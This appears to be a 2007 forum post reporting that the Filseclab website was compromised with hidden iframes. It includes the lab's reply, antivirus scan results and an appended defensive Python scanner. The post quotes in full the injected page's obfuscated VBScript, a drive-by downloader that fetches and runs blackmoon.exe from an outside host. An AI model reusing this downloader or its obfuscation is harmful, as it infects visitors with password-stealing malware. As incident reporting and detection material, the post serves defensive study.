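Hello,
Other servers in the data center that hosts our server were attacked, and our server was affected as a result. We have notified the ISP's data center about the problem and have also adjusted the defenses on our server; service has now been restored. We apologize for the trouble this has caused.
Thank you, and best wishes!
Filseclab Security Lab > Registration Center
Website: http://www.filseclab.com
E-mail: filsoft@filseclab.com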
----- Original Message -----
From: <dyw1021@qq.com>
To: register
Sent: Thursday, June 07, 2007 7:00 PM
Subject: Teacher Zhu, what is going on????
Filseclab Security Lab
www.filseclab.com
has had this inserted:
<iframe src=http://www.yx2009.com/38327.htm width=0 height=0></iframe>
The code is as follows:
<iframe src="http://www.yx2009.com/lt.htm" width=100 height=1></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/824349.js"></script>
<noscript><a href="http://www.51.la/?824349" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/824349.asp" style="border:none" /></a></noscript>
The code of http://www.yx2009.com/lt.htm is:
<html>
<title>iexplorer</title>
<script language=vbscript>
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chrw(eval(s(i)))
Next
rechange=t
End Function
t="32,32,32,32,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,32,13,10,77,83,95,85,82,76,32,61,32,34,104,116,116,112,58,47,47,119,119,119,46,121,120,50,48,48,57,46,99,111,109,47,100,111,119,110,47,98,108,97,99,107,109,111,111,110,46,101,120,101,34,13,10,32,32,32,32,60,47,115,99,114,105,112,116,62"
document.write rechange(t)
</script>
<script language="VBScript">
function itkk(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
itkk=t
End Function
t="83,101,116,32,77,83,95,68,97,116,97,99,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,32,32,32,32,77,83,95,68,97,116,97,99,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,32,32,32,32,115,101,116,117,114,108,97,61,34,100,111,119,110,34,13,10,32,32,32,32,115,101,116,117,114,108,98,61,34,102,105,108,101,34,13,10,32,32,32,32,115,101,116,117,114,108,99,61,34,99,111,112,121,34,13,10,32,32,32,32,115,101,116,117,114,108,100,61,34,101,120,105,116,34,13,10,32,32,32,32,77,83,95,68,97,116,97,105,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,13,10,32,32,32,32,83,101,116,32,77,83,95,68,97,116,97,100,32,61,32,77,83,95,68,97,116,97,99,46,67,114,101,97,116,101,79,98,106,101,99,116,40,77,83,95,68,97,116,97,105,44,34,34,41,13,10,32,32,32,32,115,101,116,117,114,108,102,61,34,65,100,111,34,13,10,32,32,32,32,115,101,116,117,114,108,103,61,34,100,98,46,34,13,10,32,32,32,32,115,101,116,117,114,108,104,61,34,83,116,114,34,13,10,32,32,32,32,115,101,116,117,114,108,105,61,34,101,97,109,34,13,10,32,32,32,32,77,83,95,68,97,116,97,102,61,115,101,116,117,114,108,102,38,115,101,116,117,114,108,103,38,115,101,116,117,114,108,104,38,115,101,116,117,114,108,105,13,10,32,32,32,32,77,83,95,68,97,116,97,103,61,77,83,95,68,97,116,97,102,13,10,32,32,32,32,115,101,116,32,77,83,95,68,97,116,97,97,32,61,32,77,83,95,68,97,116,97,99,46,99,114,101,97,116,101,111,98,106,101,99,116,40,77,83,95,68,97,116,97,103,44,34,34,41,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,116,121,112,101,32,61,32,49,13,10,32,32,32,32,77,83,95,68,97,116,97,104,61,34,71,69,84,34,13,10,32,32,32,32,77,83,95,68,97,116,97,100,46,79,112,101,110,32,77,83,95,68,97,116,97,104,44,32,77,83,95,85,82,76,44,32,70,97,108,115,101,13,10,32,32,32,32,77,83,95,68,97,1
16,97,100,46,83,101,110,100,13,10,32,32,32,32,69,120,101,70,105,108,101,61,34,77,85,69,88,69,46,101,120,101,34,13,10,32,32,32,32,115,101,116,32,77,83,95,68,97,116,97,98,32,61,32,77,83,95,68,97,116,97,99,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,32,32,32,32,115,101,116,32,77,83,95,68,97,116,97,101,32,61,32,77,83,95,68,97,116,97,98,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,111,112,101,110,13,10,32,32,32,32,69,120,101,70,105,108,101,61,32,77,83,95,68,97,116,97,98,46,66,117,105,108,100,80,97,116,104,40,77,83,95,68,97,116,97,101,44,69,120,101,70,105,108,101,41,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,119,114,105,116,101,32,77,83,95,68,97,116,97,100,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,115,97,118,101,116,111,102,105,108,101,32,69,120,101,70,105,108,101,44,50,13,10,32,32,32,32,77,83,95,68,97,116,97,97,46,99,108,111,115,101,13,10,32,32,32,32,115,101,116,32,77,83,95,68,97,116,97,101,32,61,32,77,83,95,68,97,116,97,99,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,13,10,32,32,32,32,77,83,95,68,97,116,97,101,46,83,104,101,108,108,69,120,101,99,117,116,101,32,69,120,101,70,105,108,101,44,66,66,83,44,66,66,83,44,34,111,112,101,110,34,44,48"
i=t
d=t
execute(itkk(I))
</script>
<script language=javascript src=blackmoon.js></script>
<center> <br>
</center>
</html>
After decoding, it downloads
http://www.××××.com/down/blackmoon.exe
Online scan
A-Squared: Found nothing
AntiVir: Found DR/Delphi.Gen
ArcaVir: Found nothing
Avast: Found nothing
AVG Antivirus: Found nothing
BitDefender: Found Generic.PWStealer.E6C8F7B9
ClamAV: Found nothing
Dr.Web: Found nothing
F-Prot Antivirus: Found nothing
F-Secure Anti-Virus: Found nothing
Fortinet: Found nothing
Kaspersky Anti-Virus: Found nothing
NOD32: Found a variant of Win32/PSW.Delf.NHI
Norman Virus Control: Found nothing
Panda Antivirus: Found nothing
Rising Antivirus: Found nothing
VirusBuster: Found nothing
VBA32: Found Trojan-Spy.Delf.13 (probable variant)
[ This post was last edited by dyw1021 on 2007-6-8 01:22 ]
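
The following Python is an added example, not part of the original post: it flags iframes that load another host with a 0- or 1-pixel dimension (the shape of the two injected tags quoted above) and decodes comma-separated character-code strings without executing them. The sample page, the example.invalid hosts and all function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not the page from the post): two near-invisible
# third-party iframes, one normal local iframe, one char-code string.
HIDDEN = 'MS_URL = "http://dl.example.invalid/x"'
SAMPLE = (
    '<html><iframe src=http://frames.example.invalid/a.htm width=0 height=0></iframe>\n'
    '<iframe src="http://frames.example.invalid/b.htm" width=100 height=1></iframe>\n'
    '<iframe src="/local/banner.htm" width="468" height="60"></iframe>\n'
    '<script language=vbscript>t="%s"</script></html>'
    % ",".join(str(ord(c)) for c in HIDDEN)
)

class IframeFinder(HTMLParser):
    """Collect iframes that load another host and have a 0/1-pixel dimension."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host, self.hits = page_host, []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        host = urlparse(a.get("src") or "").hostname
        dims = [a.get("width"), a.get("height")]
        tiny = any(d and d.strip().isdigit() and int(d) <= 1 for d in dims)
        if tiny and host and host != self.page_host:
            self.hits.append(a["src"])

# A quoted run of 16 or more plain decimal numbers. Only literal integers
# are accepted; expressions are never evaluated, unlike the page's eval().
CODES = re.compile(r'"((?:\d{1,5},){15,}\d{1,5})"')
URLS = re.compile(r'https?://[^\s"\'<>]+')

def decode_charcodes(html):
    """Turn each char-code list into text without executing anything."""
    return ["".join(chr(int(v)) for v in m.group(1).split(","))
            for m in CODES.finditer(html)]

def triage(html, page_host):
    finder = IframeFinder(page_host)
    finder.feed(html)
    decoded = decode_charcodes(html)
    urls = [u for text in decoded for u in URLS.findall(text)]
    return {"iframes": finder.hits, "decoded": decoded, "urls": urls}

if __name__ == "__main__":
    print(triage(SAMPLE, "www.example.invalid"))
```

The URLs recovered from the decoded text are indicators for blocklists and proxy-log searches; they are extracted as strings and never fetched.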